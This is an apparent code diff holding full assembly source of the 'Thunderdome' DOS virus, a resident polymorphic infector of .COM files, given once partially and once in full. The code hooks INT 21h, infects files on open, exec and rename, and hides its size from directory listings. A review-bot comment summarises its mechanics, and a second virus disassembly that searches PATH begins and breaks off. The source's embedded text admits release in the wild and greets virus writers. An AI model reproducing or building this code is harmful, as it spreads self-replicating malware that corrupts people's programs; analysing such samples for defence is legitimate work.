mov cx,0aaaah
|
||||
mov ax,cx
|
||||
iret
|
||||
chkfunc: cmp ah,12h
|
||||
je findFCBst
|
||||
cmp ah,11h
|
||||
je findfcbst
|
||||
cmp ah,4fh
|
||||
je findst
|
||||
cmp ah,4eh
|
||||
je findst
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push bp
|
||||
push ds
|
||||
push es
|
||||
cmp ah,3dh
|
||||
je infectHan
|
||||
cmp ah,4bh
|
||||
je infectHan
|
||||
cmp ah,41h
|
||||
je infectHan
|
||||
cmp ah,43h
|
||||
je infectHan
|
||||
cmp ah,56h
|
||||
je infectHan
|
||||
cmp ah,0fh
|
||||
je infectFCB
|
||||
cmp ah,23h
|
||||
je infectFCB
|
||||
cmp ah,6ch
|
||||
je infectdos4
|
||||
jmp endint
|
||||
|
||||
findfcbst: jmp findfcb
|
||||
findst: jmp find
|
||||
|
||||
InfectFCB: mov si,dx
|
||||
lodsb
|
||||
push cs
|
||||
pop es
|
||||
lea di,fnam
|
||||
mov cx,8
|
||||
rep movsb
|
||||
mov cx,3
|
||||
inc di
|
||||
rep movsb
|
||||
lea dx,fnam
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
InfectHan: mov si,dx
|
||||
mov cx,100h
|
||||
findpnt: lodsb
|
||||
cmp al,'.'
|
||||
je chkcom
|
||||
loop findpnt
|
||||
jmp endi
|
||||
|
||||
infectdos4: and dx,0fh
|
||||
cmp dx,1
|
||||
jne endi
|
||||
mov dx,si
|
||||
jmp infecthan
|
||||
|
||||
chkcom: lodsw
|
||||
or ax,2020h
|
||||
cmp ax,'oc'
|
||||
jne endi
|
||||
lodsb
|
||||
or al,20h
|
||||
cmp al,'m'
|
||||
je doitj
|
||||
endi: jmp endint
|
||||
doitj: push dx
|
||||
push ds
|
||||
mov ax,4300h
|
||||
call dos
|
||||
mov cs:fatr,cx
|
||||
mov ax,4301h
|
||||
sub cx,cx
|
||||
call dos
|
||||
mov ax,3d02h
|
||||
call dos
|
||||
jnc getdate
|
||||
jmp error
|
||||
getdate: mov bx,5700h
|
||||
xchg ax,bx
|
||||
call dos
|
||||
mov cs:fdat,cx
|
||||
mov cs:fdat+2,dx
|
||||
and cx,1fh
|
||||
cmp cx,1fh
|
||||
jne chkexe
|
||||
jmp done
|
||||
chkexe: mov ah,3fh
|
||||
push cs
|
||||
pop ds
|
||||
lea dx,Org_prg
|
||||
mov cx,3
|
||||
call dos
|
||||
cmp word ptr cs:Org_prg[0],'MZ'
|
||||
je close
|
||||
cmp word ptr cs:Org_prg[0],'ZM'
|
||||
je close
|
||||
|
||||
Mov ax,4202h
|
||||
sub cx,cx
|
||||
cwd
|
||||
call dos
|
||||
|
||||
sub ax,3
|
||||
mov cs:jump[1],ax
|
||||
|
||||
Add Ax,Offset Crypt+103h
|
||||
Mov S_1[1],Ax
|
||||
Mov S_2[1],Ax
|
||||
Mov S_3[4],Ax
|
||||
Mov S_4[4],Ax
|
||||
Call GenPoly
|
||||
|
||||
mov ah,40h
|
||||
push cs
|
||||
pop ds
|
||||
lea dx,coder
|
||||
mov cx,virlen
|
||||
call dos
|
||||
|
||||
mov ax,4200h
|
||||
xor cx,cx
|
||||
cwd
|
||||
call dos
|
||||
|
||||
mov ah,40h
|
||||
lea dx,jump
|
||||
mov cx,3
|
||||
call dos
|
||||
|
||||
or cs:fdat,01fh
|
||||
|
||||
close: mov ax,5701h
|
||||
mov cx,cs:fdat
|
||||
mov dx,cs:fdat[2]
|
||||
call dos
|
||||
|
||||
done: mov ah,3eh
|
||||
call dos
|
||||
pop ds
|
||||
pop dx
|
||||
push dx
|
||||
push ds
|
||||
mov ax,4301h
|
||||
mov cx,fatr
|
||||
call dos
|
||||
|
||||
error: pop ds
|
||||
pop dx
|
||||
|
||||
endint: pop es
|
||||
pop ds
|
||||
pop bp
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
jmp d ptr cs:[old21]
|
||||
|
||||
GenPoly: Xor Byte Ptr [Loopje],2
|
||||
Xor Ax,Ax
|
||||
Mov Es,Ax
|
||||
Mov Ax,Es:[46ch]
|
||||
Mov Es,Cs
|
||||
Push Ax
|
||||
And Ax,07ffh
|
||||
Add Ax,CryptLen
|
||||
Mov S_1[4],Ax
|
||||
Mov S_2[4],Ax
|
||||
Mov S_3[1],Ax
|
||||
Mov S_4[1],Ax
|
||||
Doit: Pop Ax
|
||||
Push Ax
|
||||
And Ax,3
|
||||
Shl Ax,1
|
||||
Mov Si,Ax
|
||||
Mov Ax,W Table[Si]
|
||||
Mov Si,Ax
|
||||
Lea Di,decr
|
||||
Movsw
|
||||
Movsw
|
||||
Movsw
|
||||
Movsw
|
||||
Pop Ax
|
||||
Stosb
|
||||
Movsb
|
||||
Mov Dl,Al
|
||||
Lea Si,Decr
|
||||
Lea Di,Coder
|
||||
Mov Cx,DecrLen
|
||||
Rep Movsb
|
||||
Lea Si,Crypt
|
||||
Mov Cx,CryptLen
|
||||
Encrypt: Lodsb
|
||||
Xor Al,Dl
|
||||
Stosb
|
||||
Loop Encrypt
|
||||
Cmp Dl,0
|
||||
Je Fuckit
|
||||
Ret
|
||||
|
||||
FuckIt: Lea Si,Encr0
|
||||
Lea Di,Coder
|
||||
Mov Cx,Encr0Len
|
||||
Rep Movsb
|
||||
Mov Ax,Cs:jump[1]
|
||||
Add Ax,Encr0Len+2
|
||||
Mov Cs:jump[1],Ax
|
||||
Ret
|
||||
|
||||
Db 13,10,'Created in Holland, released near Bolzano/Italy.'
|
||||
Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not'
|
||||
Db 13,10,'ment to be destructive, however, some programs might not work anymore,'
|
||||
Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your'
|
||||
Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!'
|
||||
Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).'
|
||||
Db 13,10,'Greetings go to all other virus writers!'
|
||||
|
||||
Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4
|
||||
|
||||
S_1: Lea Si,0
|
||||
Mov Cx,0
|
||||
DB 80h,34h
|
||||
Inc Si
|
||||
S_2: Lea Di,0
|
||||
Mov Cx,0
|
||||
DB 80h,35h
|
||||
Inc Di
|
||||
S_3: Mov Cx,0
|
||||
Lea Si,0
|
||||
DB 80h,34h
|
||||
Inc Si
|
||||
S_4: Mov Cx,0
|
||||
Lea Di,0
|
||||
DB 80h,35h
|
||||
Inc Di
|
||||
|
||||
Db '[ "Thunderdome" virus by '
|
||||
|
||||
Encr0 Db 'John Tardy'
|
||||
Encr0Len Equ $-Encr0
|
||||
|
||||
Db ' / TridenT ]'
|
||||
|
||||
getdta: pop si
|
||||
pushf
|
||||
push ax
|
||||
push bx
|
||||
push es
|
||||
mov ah,2fh
|
||||
call dos
|
||||
jmp short si
|
||||
|
||||
FindFCB: call DOS
|
||||
cmp al,0
|
||||
jne Ret1
|
||||
call getdta
|
||||
cmp byte ptr es:[bx],-1
|
||||
jne FCBOk
|
||||
add bx,8
|
||||
FCBOk: mov al,es:[bx+16h]
|
||||
and al,1fh
|
||||
cmp al,1fh
|
||||
jne FileOk
|
||||
sub word ptr es:[bx+1ch],Virlen
|
||||
sbb word ptr es:[bx+1eh],0
|
||||
jmp short Time
|
||||
|
||||
Find: call DOS
|
||||
jc Ret1
|
||||
call getdta
|
||||
mov al,es:[bx+16h]
|
||||
and al,1fh
|
||||
cmp al,1fh
|
||||
jne FileOk
|
||||
sub word ptr es:[bx+1ah],VirLen
|
||||
sbb word ptr es:[bx+1ch],0
|
||||
Time: xor byte ptr es:[bx+16h],10h
|
||||
FileOk: pop es
|
||||
pop bx
|
||||
pop ax
|
||||
popf
|
||||
Ret1: retf 2
|
||||
|
||||
dos: pushf
|
||||
call dword ptr cs:[old21]
|
||||
ret
|
||||
|
||||
Org_prg dw 0cd90h
|
||||
db 20h
|
||||
|
||||
fnam db 8 dup (0)
|
||||
db '.'
|
||||
db 3 dup (0)
|
||||
db 0
|
||||
fatr dw 0
|
||||
fdat dw 0,0
|
||||
|
||||
|
||||
jump db 0e9h,0,0
|
||||
|
||||
ResLen Equ ($-Decr)/10h
|
||||
|
||||
ParLen Equ (Reslen*2)+10h
|
||||
|
||||
CryptLen Equ $-Crypt
|
||||
|
||||
VirLen Equ $-Decr
|
||||
|
||||
Coder Equ $
|
||||
|
||||
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
|
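Review bot: This listing appears to be added twice: the section that begins at `@ -0,0 +1,403 @@` directly below repeats the same header, `Org 0h`, `decr: jmp Crypt`, the 'Carcass' string and the `New21` dispatch line for line as far as it is visible, so one copy looks redundant unless the two paths differ for a reason the commit message should state. Separately, the only header text is the author line, while the facts an analyst wants are all in the hunk and belong in a comment there: the 'Carcass' literal at the start of the decryptor, the residency handshake `AX = 0DEADh` answered with `AX = CX = 0AAAAh`, the date gate (year after 1993, or 1993 from month 10) before installation, the marker of a timestamp seconds field equal to 1Fh that the 11h/12h/4Eh/4Fh stealth handlers also test, and memory reservation by lowering the MCB size at `ds:[3]` and the PSP top-of-memory word at `[12h]` by ParLen. A two-line comment after `; Thunderdome virus by John Tardy / TridenT` covering those would be enough.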
@ -0,0 +1,403 @@
|
|||
;
|
||||
; Thunderdome virus by John Tardy / TridenT
|
||||
;
|
||||
|
||||
Org 0h
|
||||
|
||||
decr: jmp Crypt
|
||||
db 'Carcass'
|
||||
Loopje DB 0e2h
|
||||
db 0fah
|
||||
DecrLen Equ $-Decr
|
||||
|
||||
Crypt: Push Ax
|
||||
call Get_Ofs
|
||||
Get_Ofs: pop Bp
|
||||
sub Bp,Get_Ofs
|
||||
|
||||
Mov Ah,2ah
|
||||
Int 21h
|
||||
Cmp Cx,1993
|
||||
Ja Makeya
|
||||
jb Installed
|
||||
Cmp Dh,10
|
||||
Jb installed
|
||||
|
||||
|
||||
Makeya: Mov Ax,0DEADh
|
||||
Int 21h
|
||||
Cmp Ax,0AAAAh
|
||||
Je Installed
|
||||
|
||||
mov ax,3521h
|
||||
int 21h
|
||||
mov word ptr cs:old21[bp],bx
|
||||
mov word ptr cs:old21[bp][2],es
|
||||
|
||||
mov ax,cs
|
||||
dec ax
|
||||
mov ds,ax
|
||||
cmp byte ptr ds:[0000],'Z'
|
||||
jne installed
|
||||
mov ax,word ptr ds:[0003]
|
||||
sub ax,ParLen
|
||||
jb installed
|
||||
mov word ptr ds:[0003],ax
|
||||
sub word ptr ds:[0012h],ParLen
|
||||
lea si,decr[bp]
|
||||
xor di,di
|
||||
mov es,ds:[12h]
|
||||
mov ds,cs
|
||||
mov cx,virlen
|
||||
rep movsb
|
||||
mov ax,2521h
|
||||
mov ds,es
|
||||
mov dx,offset new21
|
||||
int 21h
|
||||
Installed: Mov Di,100h
|
||||
Push Di
|
||||
Lea Si,Org_Prg[Bp]
|
||||
Push Cs
|
||||
Pop Ds
|
||||
Push Cs
|
||||
Pop Es
|
||||
Movsw
|
||||
Movsb
|
||||
Pop Bx
|
||||
Pop Ax
|
||||
Jmp Bx
|
||||
|
||||
Old21 dd 0
|
||||
|
||||
New21: cmp ax,0deadh
|
||||
jne chkfunc
|
||||
mov cx,0aaaah
|
||||
mov ax,cx
|
||||
iret
|
||||
chkfunc: cmp ah,12h
|
||||
je findFCBst
|
||||
cmp ah,11h
|
||||
je findfcbst
|
||||
cmp ah,4fh
|
||||
je findst
|
||||
cmp ah,4eh
|
||||
je findst
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push bp
|
||||
push ds
|
||||
push es
|
||||
cmp ah,3dh
|
||||
je infectHan
|
||||
cmp ah,4bh
|
||||
je infectHan
|
||||
cmp ah,41h
|
||||
je infectHan
|
||||
cmp ah,43h
|
||||
je infectHan
|
||||
cmp ah,56h
|
||||
je infectHan
|
||||
cmp ah,0fh
|
||||
je infectFCB
|
||||
cmp ah,23h
|
||||
je infectFCB
|
||||
cmp ah,6ch
|
||||
je infectdos4
|
||||
jmp endint
|
||||
|
||||
findfcbst: jmp findfcb
|
||||
findst: jmp find
|
||||
|
||||
InfectFCB: mov si,dx
|
||||
lodsb
|
||||
push cs
|
||||
pop es
|
||||
lea di,fnam
|
||||
mov cx,8
|
||||
rep movsb
|
||||
mov cx,3
|
||||
inc di
|
||||
rep movsb
|
||||
lea dx,fnam
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
InfectHan: mov si,dx
|
||||
mov cx,100h
|
||||
findpnt: lodsb
|
||||
cmp al,'.'
|
||||
je chkcom
|
||||
loop findpnt
|
||||
jmp endi
|
||||
|
||||
infectdos4: and dx,0fh
|
||||
cmp dx,1
|
||||
jne endi
|
||||
mov dx,si
|
||||
jmp infecthan
|
||||
|
||||
chkcom: lodsw
|
||||
or ax,2020h
|
||||
cmp ax,'oc'
|
||||
jne endi
|
||||
lodsb
|
||||
or al,20h
|
||||
cmp al,'m'
|
||||
je doitj
|
||||
endi: jmp endint
|
||||
doitj: push dx
|
||||
push ds
|
||||
mov ax,4300h
|
||||
call dos
|
||||
mov cs:fatr,cx
|
||||
mov ax,4301h
|
||||
sub cx,cx
|
||||
call dos
|
||||
mov ax,3d02h
|
||||
call dos
|
||||
jnc getdate
|
||||
jmp error
|
||||
getdate: mov bx,5700h
|
||||
xchg ax,bx
|
||||
call dos
|
||||
mov cs:fdat,cx
|
||||
mov cs:fdat+2,dx
|
||||
and cx,1fh
|
||||
cmp cx,1fh
|
||||
jne chkexe
|
||||
jmp done
|
||||
chkexe: mov ah,3fh
|
||||
push cs
|
||||
pop ds
|
||||
lea dx,Org_prg
|
||||
mov cx,3
|
||||
call dos
|
||||
cmp word ptr cs:Org_prg[0],'MZ'
|
||||
je close
|
||||
cmp word ptr cs:Org_prg[0],'ZM'
|
||||
je close
|
||||
|
||||
Mov ax,4202h
|
||||
sub cx,cx
|
||||
cwd
|
||||
call dos
|
||||
|
||||
sub ax,3
|
||||
mov cs:jump[1],ax
|
||||
|
||||
Add Ax,Offset Crypt+103h
|
||||
Mov S_1[1],Ax
|
||||
Mov S_2[1],Ax
|
||||
Mov S_3[4],Ax
|
||||
Mov S_4[4],Ax
|
||||
Call GenPoly
|
||||
|
||||
mov ah,40h
|
||||
push cs
|
||||
pop ds
|
||||
lea dx,coder
|
||||
mov cx,virlen
|
||||
call dos
|
||||
|
||||
mov ax,4200h
|
||||
xor cx,cx
|
||||
cwd
|
||||
call dos
|
||||
|
||||
mov ah,40h
|
||||
lea dx,jump
|
||||
mov cx,3
|
||||
call dos
|
||||
|
||||
or cs:fdat,01fh
|
||||
|
||||
close: mov ax,5701h
|
||||
mov cx,cs:fdat
|
||||
mov dx,cs:fdat[2]
|
||||
call dos
|
||||
|
||||
done: mov ah,3eh
|
||||
call dos
|
||||
pop ds
|
||||
pop dx
|
||||
push dx
|
||||
push ds
|
||||
mov ax,4301h
|
||||
mov cx,fatr
|
||||
call dos
|
||||
|
||||
error: pop ds
|
||||
pop dx
|
||||
|
||||
endint: pop es
|
||||
pop ds
|
||||
pop bp
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
jmp d ptr cs:[old21]
|
||||
|
||||
GenPoly: Xor Byte Ptr [Loopje],2
|
||||
Xor Ax,Ax
|
||||
Mov Es,Ax
|
||||
Mov Ax,Es:[46ch]
|
||||
Mov Es,Cs
|
||||
Push Ax
|
||||
And Ax,07ffh
|
||||
Add Ax,CryptLen
|
||||
Mov S_1[4],Ax
|
||||
Mov S_2[4],Ax
|
||||
Mov S_3[1],Ax
|
||||
Mov S_4[1],Ax
|
||||
Doit: Pop Ax
|
||||
Push Ax
|
||||
And Ax,3
|
||||
Shl Ax,1
|
||||
Mov Si,Ax
|
||||
Mov Ax,W Table[Si]
|
||||
Mov Si,Ax
|
||||
Lea Di,decr
|
||||
Movsw
|
||||
Movsw
|
||||
Movsw
|
||||
Movsw
|
||||
Pop Ax
|
||||
Stosb
|
||||
Movsb
|
||||
Mov Dl,Al
|
||||
Lea Si,Decr
|
||||
Lea Di,Coder
|
||||
Mov Cx,DecrLen
|
||||
Rep Movsb
|
||||
Lea Si,Crypt
|
||||
Mov Cx,CryptLen
|
||||
Encrypt: Lodsb
|
||||
Xor Al,Dl
|
||||
Stosb
|
||||
Loop Encrypt
|
||||
Cmp Dl,0
|
||||
Je Fuckit
|
||||
Ret
|
||||
|
||||
FuckIt: Lea Si,Encr0
|
||||
Lea Di,Coder
|
||||
Mov Cx,Encr0Len
|
||||
Rep Movsb
|
||||
Mov Ax,Cs:jump[1]
|
||||
Add Ax,Encr0Len+2
|
||||
Mov Cs:jump[1],Ax
|
||||
Ret
|
||||
|
||||
Db 13,10,'Created in Holland, released near Bolzano/Italy.'
|
||||
Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not'
|
||||
Db 13,10,'ment to be destructive, however, some programs might not work anymore,'
|
||||
Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your'
|
||||
Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!'
|
||||
Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).'
|
||||
Db 13,10,'Greetings go to all other virus writers!'
|
||||
|
||||
Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4
|
||||
|
||||
S_1: Lea Si,0
|
||||
Mov Cx,0
|
||||
DB 80h,34h
|
||||
Inc Si
|
||||
S_2: Lea Di,0
|
||||
Mov Cx,0
|
||||
DB 80h,35h
|
||||
Inc Di
|
||||
S_3: Mov Cx,0
|
||||
Lea Si,0
|
||||
DB 80h,34h
|
||||
Inc Si
|
||||
S_4: Mov Cx,0
|
||||
Lea Di,0
|
||||
DB 80h,35h
|
||||
Inc Di
|
||||
|
||||
Db '[ "Thunderdome" virus by '
|
||||
|
||||
Encr0 Db 'John Tardy'
|
||||
Encr0Len Equ $-Encr0
|
||||
|
||||
Db ' / TridenT ]'
|
||||
|
||||
getdta: pop si
|
||||
pushf
|
||||
push ax
|
||||
push bx
|
||||
push es
|
||||
mov ah,2fh
|
||||
call dos
|
||||
jmp short si
|
||||
|
||||
FindFCB: call DOS
|
||||
cmp al,0
|
||||
jne Ret1
|
||||
call getdta
|
||||
cmp byte ptr es:[bx],-1
|
||||
jne FCBOk
|
||||
add bx,8
|
||||
FCBOk: mov al,es:[bx+16h]
|
||||
and al,1fh
|
||||
cmp al,1fh
|
||||
jne FileOk
|
||||
sub word ptr es:[bx+1ch],Virlen
|
||||
sbb word ptr es:[bx+1eh],0
|
||||
jmp short Time
|
||||
|
||||
Find: call DOS
|
||||
jc Ret1
|
||||
call getdta
|
||||
mov al,es:[bx+16h]
|
||||
and al,1fh
|
||||
cmp al,1fh
|
||||
jne FileOk
|
||||
sub word ptr es:[bx+1ah],VirLen
|
||||
sbb word ptr es:[bx+1ch],0
|
||||
Time: xor byte ptr es:[bx+16h],10h
|
||||
FileOk: pop es
|
||||
pop bx
|
||||
pop ax
|
||||
popf
|
||||
Ret1: retf 2
|
||||
|
||||
dos: pushf
|
||||
call dword ptr cs:[old21]
|
||||
ret
|
||||
|
||||
Org_prg dw 0cd90h
|
||||
db 20h
|
||||
|
||||
fnam db 8 dup (0)
|
||||
db '.'
|
||||
db 3 dup (0)
|
||||
db 0
|
||||
fatr dw 0
|
||||
fdat dw 0,0
|
||||
|
||||
|
||||
jump db 0e9h,0,0
|
||||
|
||||
ResLen Equ ($-Decr)/10h
|
||||
|
||||
ParLen Equ (Reslen*2)+10h
|
||||
|
||||
CryptLen Equ $-Crypt
|
||||
|
||||
VirLen Equ $-Decr
|
||||
|
||||
Coder Equ $
|
||||
|
||||
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
|
@ -0,0 +1,785 @@
|
|||
; Start disassembly
|
||||
DATA_1E EQU 64H ; (761D:0064=0)
|
||||
DATA_2E EQU 66H ; (761D:0066=0)
|
||||
DATA_3E EQU 68H ; (761D:0068=0)
|
||||
DATA_10E EQU 4F43H ; (761D:4F43=0)
|
||||
DATA_11E EQU 504DH ; (761D:504D=0)
|
||||
|
||||
SEG_A SEGMENT
|
||||
ASSUME CS:SEG_A, DS:SEG_A
|
||||
|
||||
|
||||
ORG 100h
|
||||
|
||||
Time PROC FAR
|
||||
|
||||
start:
|
||||
JMP Virus_Entry_Point ;
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Original Program without 1st three bytes... ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
DATA_5 DB 9987 DUP (90H)
|
||||
MOV AH,4CH ;
|
||||
MOV AL,DATA_2 ; Terminate to DOS with
|
||||
INT 21H ; exitcode AL
|
||||
DB 0
|
||||
DATA_2 DB 0
|
||||
DB 0
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Virus Entry Point ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Virus_Entry_Point:
|
||||
JMP SHORT Set_Virus_Data_Point
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Set Virus Data Storage Point ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Set_Virus_Data_Point:
|
||||
PUSH CX ; Store CX
|
||||
MOV DX,2B2DH ;
|
||||
MOV SI,DX ; SI points at start of
|
||||
; virus data
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Get DTA Address ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
|
||||
PUSH ES ; Store ES
|
||||
MOV AH,2FH ; GET DTA address into
|
||||
INT 21H ; ES:BX
|
||||
MOV [SI],BX ; Store BX of DTA
|
||||
MOV [SI+2],ES ; Store ES of DTA
|
||||
POP ES ; Restore ES
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Set new DTA Address ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
MOV DX,4EH ;
|
||||
ADD DX,SI ;
|
||||
MOV AH,1AH ;
|
||||
INT 21H ; Set new DTA to DS:DX
|
||||
|
||||
PUSH SI ; Store SI
|
||||
CLD ; Clear direction
|
||||
MOV DI,SI ;
|
||||
ADD SI,0AH ;
|
||||
ADD DI,81H ;
|
||||
MOV CX,3 ; Move 3 bytes from source
|
||||
REP MOVSB ; to destination (E9h, 45h
|
||||
; 45h)
|
||||
POP SI ; Restore SI
|
||||
|
||||
PUSH ES ; Store ES
|
||||
PUSH SI ; Store SI
|
||||
PUSH BX ; Store BX
|
||||
MOV BX,2CH
|
||||
MOV AX,[BX] ; Get Extra Segment?
|
||||
POP BX ; Restore BX
|
||||
MOV ES,AX
|
||||
MOV DI,0
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Search for the PATH ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Search_For_Path:
|
||||
POP SI ; Restore SI
|
||||
PUSH SI ; Store SI
|
||||
ADD SI,1AH ;
|
||||
LODSB ; Load the 'M' into AL
|
||||
MOV CX,8000H ;
|
||||
REPNE SCASB ;
|
||||
MOV CX,4 ;
|
||||
Path_Loop:
|
||||
LODSB ;
|
||||
SCASB ;
|
||||
JNZ Search_For_Path ;
|
||||
LOOP Path_Loop ; Pitty, PATH not yet found.
|
||||
|
||||
POP SI ; Restore SI
|
||||
POP ES ; Restore ES
|
||||
MOV [SI+16H],DI ; Store address of PATH
|
||||
MOV BX,SI ; Temp. Storage of SI
|
||||
ADD SI,26H ;
|
||||
MOV DI,SI ;
|
||||
JMP SHORT Find_First_FileName
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
